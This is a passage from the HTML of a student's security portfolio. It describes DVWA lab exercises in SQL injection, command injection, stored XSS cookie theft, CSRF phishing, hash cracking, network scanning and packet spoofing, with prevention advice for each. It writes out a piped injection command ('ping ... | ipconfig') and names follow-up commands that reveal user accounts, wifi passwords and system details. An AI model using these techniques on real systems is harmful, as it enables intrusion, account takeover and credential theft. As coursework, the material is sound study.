          good sign because I good use this to determine what the names are of the user tables and
          check if there might be some more tables I want to focus on, for example credit card
          information of the users.</p>
          <a href="../../img/portfolio/red/GetUserAndPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/GetUserAndPass.png" alt=""></a>
          <p>But in this case we won't go after people's credit card information but after there
          password. I know the user table name from the previous query and now I can just try some
          common column names like; username, user, name, those type of things.</p>
          <p>And we got a username and a hash! But now what? The username is simple but the password
          is hashed and can't be just copied and used.</p>
          <a href="../../img/portfolio/red/HashDecrypt.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/HashDecrypt.png" alt=""></a>
          <p>That's were this site comes in. I just insert the md5 hash in this decryptor and it
          checks a big database with common hashes and their decrypted word. And now I have the
          password and I can just login with admin/password.</p>
          <p>So how would you prevent this? The best thing to do is sanitize the queries. Make sure
          all the queries use prepared statements and are parameterised. This prevents people
          inserting for example strings instead of numbers and prevents them from ignoring your
          query and inserting their own.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: SQL injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal9" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Command injection</p>
          <p>I applied sql injection on a ping function in DVWA.</p>
          <a href="img/portfolio/Command%20injection.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/Command%20injection.png" alt=""></a>
          <p>The way this function works is it takes the ip and inserts it directly in a shell. It
          would probably looks like something like this "ping 'INSERTED_IP'".</p>
          <p>Now this little symbol "|" is called a pipe and it can be used to execute multiple
          commands in one line. So I used the "|" to execute my own command after the ping command
          just like shown above.</p>
          <p>I typed in the ip because it still needs to execute the ping command and after that I did
          a "ipconfig" so the command would look like this when executed in the shell: "ping
          185.230.127.234 | ipconfig" This gave us the ip information of the machine the webpage
          is running on.</p>
          <a href="../../img/portfolio/red/CmdCurrentUser.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdCurrentUser.png" alt=""></a>
          <p>I can also get the current user logged in user from the machine using "net user". But
          with "net user" you can do much more even change the password of the current user or
          create a completely new user just for me.</p>
          <a href="../../img/portfolio/red/CmdWifiPass.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdWifiPass.png" alt=""></a>
          <p>What is maybe even better I can get the wifi password of the connected pc in plain text.
          Now I can connect to the same network because I know the password.</p>
          <a href="../../img/portfolio/red/CmdEnterpriceWifi.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CmdEnterpriceWifi.png" alt=""></a>
          <p>This trick doesn't work with more advanced wifi security though. Here you see the eduroam
          network from school which is protected with 802.1x control. This doesn't mean you can't
          get the password at all it just makes it a whole lot harder.</p>
          <a href="../../img/portfolio/red/CIDIR.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CIDIR.png" alt=""></a>
          <p>I was also able to run the "dir" command. This tells me a lot about the local machine and
          how the web server is installed.</p>
          <a href="../../img/portfolio/red/CISystemInfo.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CISystemInfo.png" alt=""></a>
          <P>With the "systeminfo" command I'm able to get a lot of information about the physical
          machine which might be useful to me later. It greatly increases my attack surface.</P>
          <p>This can be prevented by sanitizing the input and not just inserting it straight into the
          shell. Make sure it goes to a parameterised function first, check the input and then
          insert it into a shell for example.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Command injection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal10" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site scripting</p>
          <p>I will now show you how you could apply XSS to a website.</p>
          <a href="../../img/portfolio/red/XSSAlert.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlert.png" alt=""></a>
          <p>First I have to check if the website is vulnerable. The easiest way to check this is just
          to try a simple "Alert" script just like this.</p>
          <a href="../../img/portfolio/red/XSSAlertResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSAlertResult.png" alt=""></a>
          <p>As you can see the script works so that means that the website is vulnerable to XSS. Now
          I can try something that has some more impact and could actually be useful for me.</p>
          <a href="../../img/portfolio/red/MaxCharLimit.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/MaxCharLimit.png" alt=""></a>
          <p>This form doesn't allow more than 50 characters, so writing bigger scripts might make
          this difficult. Luckily they only validate this in the frontend so I can just inspect
          this page and change the maximum characters in the form. So now I can write some bigger
          scripts that give me more information.</p>
          <a href="../../img/portfolio/red/XSSGetCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>Like getting the cookie of the user so I can hijack their session.</p>
          <a href="../../img/portfolio/red/XSSGetCookieResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSGetCookieResult.png" alt=""></a>
          <p>So now I got the cookie it is my own though, but these scripts get stored inside the
          comments and the comments are persistent. Therefore I could also write a script that
          sends the cookie to me instead of displaying it. This way I can make it almost invisible
          for everyone to see and everyone who loads this page their cookie gets send to me.</p>
          <a href="../../img/portfolio/red/XSSOldCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSOldCookie.png" alt=""></a>
          <p>Now I can try to use the cookie that I stole in the previous picture to try and login. As
          you can see my cookie is now different and I'm not logged in.</p>
          <a href="../../img/portfolio/red/XSSNewCookie.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSNewCookie.png" alt=""></a>
          <p>Now I placed the cookie I stole in my own cookie to hopefully make the website think I'm
           the person who is logged in that I stole this cookie from.</p>
          <a href="../../img/portfolio/red/XSSSessionHijack.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSSessionHijack.png" alt=""></a>
          <p>And now when I try to load the index page the website thinks I'm logged in as the person
          the cookie belongs to and I hijacked their session. I can now do everything on their
          account, comment in their name and change their data or steal their data.</p>
          <p>And if this person is by any chance an admin I might be able to do some more extreme
          things as well. Like creating or deleting users or their comments.</p>
          <a href="../../img/portfolio/red/XSSIframe.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframe.png" alt=""></a>
          <P>Sometimes the programmers try to prevent XSS by filtering out the script tags. But they
          forget the filter out all the other HTML tags. So I can load my own website in an
          "Iframe".</P>
          <a href="../../img/portfolio/red/XSSIframeResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/XSSIframeResult.png" alt=""></a>
          <p>This might only sound as good free marketing but you can also do other things. Like
          redirecting everyone that visits this page to my own website or inject scripts in other
          html tags, so I can still run my scripts even though they banned the script tags.</p>
          <p>These type of attacks can be prevented by sanitizing the input much like SQL injection.
          Make sure that all the text that users can post to the website's frontend doesn't get
          converted to straight HTML. In this way they can't exploit other HTML tags as well.</p>
          <ul class="list-inline">
          <li>Date: October 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site scripting</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal11" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Cross-site request forgery</p>
           <p>Now I'm going to exploit CSRF on a website. The principles are quite simple, if you see
          the query that is called in the search bar, then the website might be vulnerable.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>As you can see in the search bar the website creates a query. If I would send this query
          without the form it would work as well but only for me. So I need to get this link to an
          user fill in my own password and make him click it.</p>
          <a href="../../img/portfolio/red/CSRFHTMLFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFHTMLFile.png" alt=""></a>
          <p>So I created a little phishing email using HTML. By using HTML I can make the email as
          legit as possible. By hiding the actual link in a text or even adding the DVWA logo. If
          I would know how they normally would send emails to their users, I could fully recreate
          it and you won't see the difference.</p>
          <a href="../../img/portfolio/red/CSRFUserEmail.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFUserEmail.png" alt=""></a>
          <p>The user would get an email like this and if you add urgency to the message, the user
          might not even think about any red flags because they feel the need to act as fast as
          possible.</p>
          <a href="../../img/portfolio/red/CSRFLinkResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLinkResult.png" alt=""></a>
          <p>Now the user got send to the same page to change your password, but I already changed it
          when it loaded the page.</p>
          <a href="../../img/portfolio/red/CSRFLogin.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CSRFLogin.png" alt=""></a>
          <p>Now if the user tries to login he can't because the password is changed, and I can log
          into his account and exploit it as much as I want.</p>
          <p>These type of attacks can be prevented by using things like a CAPTCHA or asking the user
          to fill in their old password. Even though this cannot fully prevent this type of attack
          it will make it a lot harder to succeed</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Cross-site request forgery</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
           </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal12" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Path traversal</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Path traversal</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal13" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Password cracking</p>
          <p>Now I'm going to show to basics of password cracking.</p>
          <p>
          There are a few main ways to crack passwords
          <ul>
          <li>Brute forcing</li>
          <li>Dictionary attacks</li>
          <li>Rainbow tables</li>
          </ul>
          </p>
          <p>Brute forcing is the most basic way to crack a password, it just tries every possible
          combination of letters. It has a few pros and some big cons.</p>
          <p>Brute forcing is rarely used these days just for the simple reason that cracking a modern
          encrypted password would take more then a lifetime. It also costs a lot of computing
          power because it generates the hashes on the fly and there are a lot of hashes to
          generate and try. The pro is though that it doesn't use any storage space because it
          generates everything instead of getting them for a wordlist. Brute forcing could be an
          option when you know that the password that you're cracking isn't a existing word but
          rather a string of random numbers and letters. Even though brute forcing might be the
          only option in that case, you're probably better off finding another way to get the
          password.</p>
          <p>Dictionary attacks are more sophisticated, it's way more efficient and faster but there a
          big con.</p>
          <p>Dictionary attacks use a predefined list of words and generates hashes for them and then
          compare them to the hash you want to crack to see if any of them match. The pro is that
          this is way faster. The downside on the other hand is that if the password you want to
          crack isn't in the word list you have no chance of success. The dictionary attack could
          be extended by generating multiple versions of every word some with captitals some with
          random numbers after them etc. A dictionary attack could also be made very personal and
          tailored to the specifications of your target. For example adding the targets place of
          work or pet names to the list. Also if you want more chance of success you'll need a
          bigger word list and those can grow pretty fast costing thus a lot of storage space.</p>
          <p>Rainbow tables are in essence a lot like dictionary attacks, but actually better.</p>
          <p>Rainbow tables contain like a dictionary attack a wordlist. The difference is that the
          wordlist is already hashed and could contain all possible solutions making a look like a
          brute force. You could for instance create a rainbow table having every possible
          solution making it a bruto force but more efficient costing less time, or generate
          hashes for your dictionary attack wordlist which might be reusable costing you less time
          in the future. Rainbow tables do come with some downsides like it costs a lot of
          harddisk space, less then a dictionary attack of the same size because it uses lossless
          compression, but if you want a lot of possibilities it will still be a big file. The
          hash type like MD5 or SHA256 is static thus making it less versatile/useful when you
          don't know the encryption type. Same goes for the salt, a salt could be added to the
          list but it will make the file even bigger. A problem that you won't have with a
          dictionary attack or brute force because the hashes get generated in the fly.</p>
          <p>A good way to make encrypted passwords harder to crack is by using a salt or a pepper. A
          salt is random data added to the password before it's hashed, and because it's different
          for every new password it gets stored alongside the password. This has a pro and a con.
          The pro is that the salt is different for every password meaning that if one password
          gets compromised the others are still save. The downside is though that if someone
          breaches the database he will know the salts for each password instantly. Now a pepper
          uses the same method to encrypt a password, it is random data and adds it to the
          password before it's hashed. But a pepper is static and is stored separately from the
          password hashes. Now this method has a pro and con as well. The pro is that if the
          database is breached the hacker won't know the pepper making cracking the passwords a
          lot harder. The con is that if he finds the pepper all the passwords are compromised,
          but to do that he might need to decompile the code and find the pepper, which is a lot
          harder than breaching the database most of the time.</p>
          <a href="../../img/portfolio/red/CrackHashGenerate.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashGenerate.png" alt=""></a>
          <p>I created a small demonstration on hacking a simple MD5 hash. So I first of all created a
          hash for the string "password".</p>
          <a href="../../img/portfolio/red/CrackHashId.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashId.png" alt=""></a>
          <p>If I would have stole this hash from some database I might not know the hash type, which
          is important for me to know if I want to save time or use a rainbow table. So I ran
          "Hash-identifier" and gave it the hash. This gives me an idea what the hash type might
          be.</p>
          <a href="../../img/portfolio/red/CrackHashFile.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashFile.png" alt=""></a>
          <p>I placed the has in a file. In this case there's only one hash in there but in reality
          this list could contain all the hashes from a certain database.</p>
          <a href="../../img/portfolio/red/CrackHashResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/CrackHashResult.png" alt=""></a>
          <p>Now I used "Hashcat" to crack the password using a wordlist called "rockyou". This
          wordlist contains the most common password based on data breaches in the past. As you
          can see it cracked the password and it only took 1 second. Do mind that in this case the
          password was high up in the wordlist. The program only went through 0.03% of the entire
          wordlist, if the password was much lower in the list this would take a lot longer.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Password cracking</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal14" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
           <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network scanning and enumeration</p>
          <p>To create a demo for this a made up a scenario. The scenario is that I got VPN access to
          a place I want to hack and I want to know how the network looks like. This is no actual
          hack but mere a VPN tunnel to my own home.</p>
          <a href="../../img/portfolio/red/NetworkScanConnVPN.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanConnVPN.png" alt=""></a>
          <p>So I looked up in which IP range I was so I had a clue from which I could continue.</p>
          <a href="../../img/portfolio/red/NetworkScanDone.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDone.png" alt=""></a>
          <p>I did a network scan using NMap in the ip range that I was connected to. As you can see
          on the left hand side there are some machines that came up in the scan which I could
          take a look at.</p>
          <a href="../../img/portfolio/red/NetworkScanTopology.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanTopology.png" alt=""></a>
          <p>I took a look at the topology of the network first. This is a easy way to get an overview
          of the network, all with connected routers, AP's and switches. I can also see in this
          diagram that there are some devices in red which mean they have 6 or more open ports,
          those devices might be more interesting to me</p>
          <a href="../../img/portfolio/red/NetworkScanNASHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASHost.png" alt=""></a>
          <p>I see that this machine is different from the rest, it's the only one running FreeBSD so
          that might be interesting.</p>
          <a href="../../img/portfolio/red/NetworkScanNASPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanNASPorts.png" alt=""></a>
          <p>This machine has open ports for the smb protocol which could mean this is a NAS. I could
          use this information to go further and get for example access to the samba shares.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterHost.png" alt=""></a>
          <p>Using the before mentioned topology graph I noticed that the router has a lot of open
          ports as well. Getting into a network's router could give me more access to other parts
          of the network.</p>
          <a href="../../img/portfolio/red/NetWorkScanRouterPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanRouterPorts.png" alt=""></a>
          <p>Here I can see that the router has some open ports for ssh, telnet and some webserver I
          can poke at.</p>
          <a href="../../img/portfolio/red/NetWorkScanDesktopHost.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetWorkScanDesktopHost.png" alt=""></a>
          <p>While looking at the topology graph I saw another machine with a lot of open ports so I
          took a look, and it looks like a windows machine.</p>
          <a href="../../img/portfolio/red/NetworkScanDesktopPorts.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/NetworkScanDesktopPorts.png" alt=""></a>
          <p>There are a few different open ports on this machine then other regular desktops. Like a
          MariaDB which I could try to access or take a look at the webserver. The Windows RPC
          protocol is running on an open port which I can utilize to get in because there are some
          known exploits for that.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network scanning and enumeration</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal15" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Network sniffing and spoofing</p>
          <p>I will show 2 little demos as a proof of concept.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPSite.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPSite.png" alt=""></a>
          <p>I have a "pi-hole" server running on my network that acts as my home dns server. It has a
          login screen for a dashboard with statistics but it is not HTTPS secured. So I tried
          catching the password with Wireshark while logging in.</p>
          <a href="../../img/portfolio/red/WiresharkHTTPResult.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WiresharkHTTPResult.png" alt=""></a>
          <p>When I filter Wireshark to only HTTP and logged in in te website I can see my IP and the
          website's IP. When I open the packet and took a look what's inside, you can see the form
          post with password in plain text. Now this website doesn't hash the password so I can
          see the password in plain text, otherwise I would have seen a hash which I had to
          decrypt to get the password.</p>
          <a href="../../img/portfolio/red/ScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/ScapyPacket.png" alt=""></a>
          <p>I created a fake IPV4 packet using "scapy". I made it so that it looks like the packet is
          coming from google, but It's actually from me and I put my malicious code in it.</p>
          <a href="../../img/portfolio/red/WireSharkScapyPacket.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/WireSharkScapyPacket.png" alt=""></a>
          <p>I captured the packet with Wireshark and as you can see the source address is google, but
          when you look in the raw my malicious code is in there.</p>
          <ul class="list-inline">
          <li>Date: November 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Network sniffing and spoofing</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal16" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Law, Ethics and Responsible Disclosure</p>
          <p>The Ethics are both quite abstract though logical at the same time. The are written in an
          abstract manner in which they could apply to even other things than hacking. Thus making
          it logical as well. Many things you wouldn't do to someone in real life you wouldn't do
          online. I think it's the same point <a href="https://www.youtube.com/watch?v=HmZm8vNHBSU">these</a> guys tried to make,
          except badly executed.</p>
          <P>In my opinion the internet is one of the last few free places there are in the world.
          Though sometimes tightly controlled by governments, look at China or North-Korea, people
          still find ways around the system to express their voices. I agree with the ethics being
          like gentlemen rules, just don't be a dick to someone, don't do anything you wouldn't
          want to be done to yourself. But this doesn't include expressing your opinion even
          though it might hurt some people. On the internet you still got the right to say those
          things the same as people having the right to disagree and say something about it. While
          in the real world when you say something wrong people will call it a form of
          discrimination and you'll get prosecuted. Thus undermining the freedom of speech and
          creating more and more censorship.</P>
          <p>These are the responsible disclosures of companies I compared.</p>
          <ul>
          <li><a href="https://www.google.com/about/appsecurity/">Google</a></li>
          <li><a href="https://support.apple.com/en-us/HT201220">Apple</a></li>
          <li>
          <a href="https://fontys.nl/Over-Fontys/Organisatie-en-sturing/Onze-organisatieNieuw/Regelingen-statuten-en-reglementen/Responsible-disclosure-Fontys-Hogescholen.htm">Fontys</a>
          </li>
          </ul>
          <p>The first things that stood out to me was the rewards. While Google and Apple being big
          corporations reward the people with big sums of money, the Fontys rewards them by
          putting their name on the wall of fame. Looking at other smaller companies it is more
          common to give some merchandise, putting their names on the hall of fame or giving a
          small amount of money compared to the big numbers Google and Apple are giving as
          rewards.</p>
          <p>What they all have in common is that they want a full detailed report of what you did so
          they can reproduce the scenario. They all don't want you to make anything public before
          they had a chance to fix it and don't dig any deeper in sensitive date that is necessary
          to proof the vulnerability.</p>
          <p>They all also state that even though you did anything illegal while proofing the
          vulnerability, if you follow their responsible disclosure and follow their rules they
          won't pursue any legal actions.</p>
          <p>It is quite logical that companies don't prosecute these people and give them rewards
          instead, because if you think about it they will lose far less money when they pay these
          rewards then if they get hacked by a real threat. Looking at <a href="https://www.bugcrowd.com/bug-bounty-list/">this</a> website a lot of
          companies share that same ideology.</p>
          <ul class="list-inline">
          <li>Date: December 2019</li>
          <li>Client: Fontys</li>
          <li>Category: Law, Ethics and Responsible Disclosure</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal17" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Basic hacking process</p>
          <p>First lets talk about the basic hacking process. This is a process most hackers will
          follow when conducting a hack, good or bad. Though good and bad use this process there
          is a key difference between the two.</p>
          <a href="../../img/portfolio/red/hackingstappen.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/hackingstappen.png" alt=""></a>
          <p>These are the basic hacking steps that are needed to conduct a good hack.</p>
          <h3>Intel Gathering</h3>
          <p>Intel gathering is the first step in the basic hacking process. In this step the hacker
          tries to gain as much information on his target as possible. He'll conduct for instance
          a OSINT, go to the physical location of his target and get a feel for the place and
          maybe even use social engineering to call his target and try to extract information.</p>
          <h3>Footprint</h3>
          <p>Now the hacker will conduct a network scan and try to gain as much information on the
          target's network as possible. He needs to find a foothold from which he can continue
          further, think about ip ranges, open ports, OS versions and important servers.</p>
          <h3>Vuln Analysis</h3>
          <p>The hacker will now look for any out of date software or operating systems to use
          exploits on. Whenever he'll find a software version he'll look if there's a CVE entry
          for that he could exploit. He might also use some automated tools to find common
          vulnerabilities for him. The hacker will also try any website for web vulnerabilities
          like SQL injection, command injection, CSRF and XSS.</p>
          <h3>Exploitation</h3>
          <p>Now is time for action. The hacker will use the information and vulnerabilities he found
          in the previous step to use his exploits. Thus gaining access to his target or the
          information he's after. Most ethical hackers/pentesters will stop after this step or not
          even do this step at all because it might result in destabilizing or shutting down the
          targets network.</p>
          <h3>Post Exploitation</h3>
          <p>This step and the following is more applicable to the bad actors out there. Here the
          hacker will extract the data he's after, edit some data, create new accounts and setup
          persistence for a backdoor so he can come back later without going through the same
          process again or have the risk of the target patching the vulnerability he used.</p>
          <h3>Clean Up</h3>
          <p>This step is very important for bad actors to not get caught. Here the hacker will try to
          remove all of his footsteps like logs. Therefore the police or target will not be able
          to track him down or even know what he did in the first place.</p>
          <a href="../../img/portfolio/red/Cyber-Kill-Chain.png"><img class="img-fluid d-block mx-auto" src="../../img/portfolio/red/Cyber-Kill-Chain.png" alt=""></a>
          <p>Now this is the cyber kill chain even though it's comparable to the basic hacking process
          there are some differences.</p>
          <h3>Reconnaissance</h3>
          <p>Here the hacker will conduct recon comparable to the intel gathering stage in the basic
          hacking process.</p>
          <h3>Weaponization</h3>
          <p>In this step the hacker is already creating a payload with an exploit to attack his
          target. It is notable that in the cyber killchain they skip the footprint and vuln
          analysis stages.</p>
          <h3>Delivery</h3>
          <p>Now the payload is to be delivered to the target this can be done by phising email,
          rubber ducky and so on. This stage is also not present in the basic hacking process,
          there it's more part of the exploitation stage.</p>
          <h3>Exploitation</h3>
          <p>When the payload is delivered the hacker will activate his attack.</p>
          <h3>Installation</h3>
          <p>In this stage the hacker will install for example malware to create persistence for a
          backdoor or to act more stealthy. This would happen in the post exploitation stage in
          the basic hacking process.</p>
          <h3>Command & Control</h3>
          <p>Now the installed malware will call back to the command and control system and give the
          hacker control of the hacked system. This can be both part of the exploitation and post
          exploitation stage in the basic hacking process.</p>
          <h3>Actions on Objectives</h3>
          <p>Here the hacker will do whatever his intentions were.</p>
          <h4>The minimal requirements for a good pentest contract and pentest report</h4>
          <p>In a good pentest contract there should be a clearly defined scope and procedures in case
          of emergency. The contract should also include a confidentiality agreement. The pentest
          report should include the scope and goal of the project with the findings and how it was
          done. It should be explained very carefully and readable for people that weren't aware
          of the project. The most important thing is ofcourse the advice to give to the company,
          this way they'll be able to fix any security leaks and the pentest was a success.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Basic hacking process</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal18" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          <h2 class="text-uppercase">Fontys S4</h2>
          <p class="item-intro text-muted">Self reflection</p>
          <p>The semester started quite slowly for me. It wasn't really clear for me were I should
          start and were I should look for the right information. This semester was quite
          different from the defending one. In the defending semester everything went quite easy
          and smooth and I had a clear goal that I wanted to achieve, I felt like I missed that
          this semester, hens why it didn't start so smoothly.</p>
          <p>I started this semester with absolutely no knowledge in hacking into things. I learned
          quite a lot this semester, must of the things I learned listening to podcasts and
          understanding the different concepts and trying different things on DVWA.</p>
          <p>I still don't really feel like I could actually conduct a good pentest and find some
          decent results after this semester which I think sucks, because I feel like I should. I
          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
          it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
